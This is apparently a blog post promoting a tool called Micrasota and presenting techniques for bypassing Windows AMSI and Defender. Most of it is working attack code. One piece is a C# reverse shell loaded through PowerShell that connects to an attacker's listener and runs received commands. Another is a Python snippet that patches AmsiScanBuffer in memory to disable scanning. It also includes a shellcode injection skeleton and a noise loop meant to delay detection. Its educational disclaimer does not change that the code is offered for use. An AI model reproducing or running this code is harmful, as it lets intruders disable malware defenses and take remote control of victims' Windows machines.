New Amsi bypass 2025

 

AMSI Bypass Techniques: Evading Windows Defender with Modern Methods

Introduction

Hello Microsoft team and fellow cybersecurity enthusiasts,

In this post, I’ll walk you through the process of bypassing the Antimalware Scan Interface (AMSI) on Windows. We’ll explore traditional evasion methods, their limitations, and how modern, more sophisticated techniques—especially those implemented using a tool I developed called Micrasota—can be used to defeat AMSI and Windows Defender effectively.

---

What is AMSI?

AMSI is a Microsoft security feature designed to scan and block malicious code, especially scripts executed via PowerShell, CMD, WScript, or CScript. While powerful, AMSI has several design limitations that make it vulnerable to certain evasion techniques.

---

Traditional Methods vs. Micrasota

Old-school bypass techniques include:

• Code fragmentation

• Variable manipulation

• Instruction concatenation

These methods were once effective but are now easily detected by Windows Defender and modern antivirus solutions.

The Micrasota tool uses more advanced, multi-layered strategies. It leverages C# and Python code execution through PowerShell, enabling dynamic in-memory execution and deeper evasion of signature and behavioral detection.

---

AMSI Bypass Techniques

1. Reverse Shell Using C# Injected from PowerShell

powershell

Add-Type -TypeDefinition @"
using System;
using System.Net.Sockets;
using System.IO;
using System.Diagnostics;

public class RevShell {
    public static void Connect() {
        string host = "$LHOST";
        int port = $LPORT;
        try {
            TcpClient client = new TcpClient(host, port);
            NetworkStream stream = client.GetStream();
            StreamReader reader = new StreamReader(stream);
            StreamWriter writer = new StreamWriter(stream) { AutoFlush = true };
            string cmd;
            while ((cmd = reader.ReadLine()) != null) {
                Process proc = new Process();
                proc.StartInfo.FileName = "cmd.exe";
                proc.StartInfo.Arguments = "/c " + cmd;
                proc.StartInfo.RedirectStandardOutput = true;
                proc.StartInfo.RedirectStandardError = true;
                proc.StartInfo.UseShellExecute = false;
                proc.StartInfo.CreateNoWindow = true;
                proc.Start();
                writer.WriteLine(proc.StandardOutput.ReadToEnd());
                writer.WriteLine(proc.StandardError.ReadToEnd());
            }
            client.Close();
        } catch (Exception) { }
    }
}
"@ -Language CSharp

2. Disabling AMSI via Python from PowerShell

$pycode = @"
import ctypes

kernel32 = ctypes.windll.kernel32
amsi = ctypes.windll.amsi
amsi_scan_buffer = amsi.AmsiScanBuffer

func_addr = ctypes.cast(amsi_scan_buffer, ctypes.c_void_p).value
old_protect = ctypes.c_uint32(0)
kernel32.VirtualProtect(func_addr, 1, 0x40, ctypes.byref(old_protect))
patch = (ctypes.c_char * 1)(b'\xC3')
ctypes.memmove(func_addr, patch, 1)
kernel32.VirtualProtect(func_addr, 1, old_protect.value, ctypes.byref(old_protect))

print("AMSI Bypass successful!")
"@

python -c $pycode

3. In-Memory Shellcode Injection via C#

csharp

[DllImport("kernel32.dll")]
static extern IntPtr VirtualAlloc(...);

[DllImport("kernel32.dll")]
static extern IntPtr CreateThread(...);

public static void RunShell() {
    byte[] shellcode = new byte[] { /* Your Payload */ };
    IntPtr addr = VirtualAlloc(...);
    memcpy(addr, shellcode, (UIntPtr)shellcode.Length);
    CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, out _);
}

4. Delaying Detection: Wasting Time with Noise

powershell

for ($i = 0; $i -lt 100; $i++) {
    Get-Process
    Get-Service
    Get-EventLog -LogName Application
    Get-Date
}

---

Conclusion

The Micrasota tool, alongside the advanced techniques demonstrated above, provides an effective way to bypass modern AMSI protections. Combining PowerShell, C#, and Python execution within a single framework gives attackers the edge to bypass behavioral detection systems like Defender.

However, it’s important to stress: these techniques are shared for educational and ethical research purposes only. Understanding vulnerabilities is a step toward improving defense—not enabling unauthorized attacks.

---

Disclaimer

This post is for educational and research purposes only. Any misuse or illegal activity inspired by this content is strictly discouraged and may result in criminal charges.

---

In the next blog, I’ll explore the Micrasota Framework in depth and demonstrate how it automates AMSI bypass and payload execution across various layers. Stay tuned!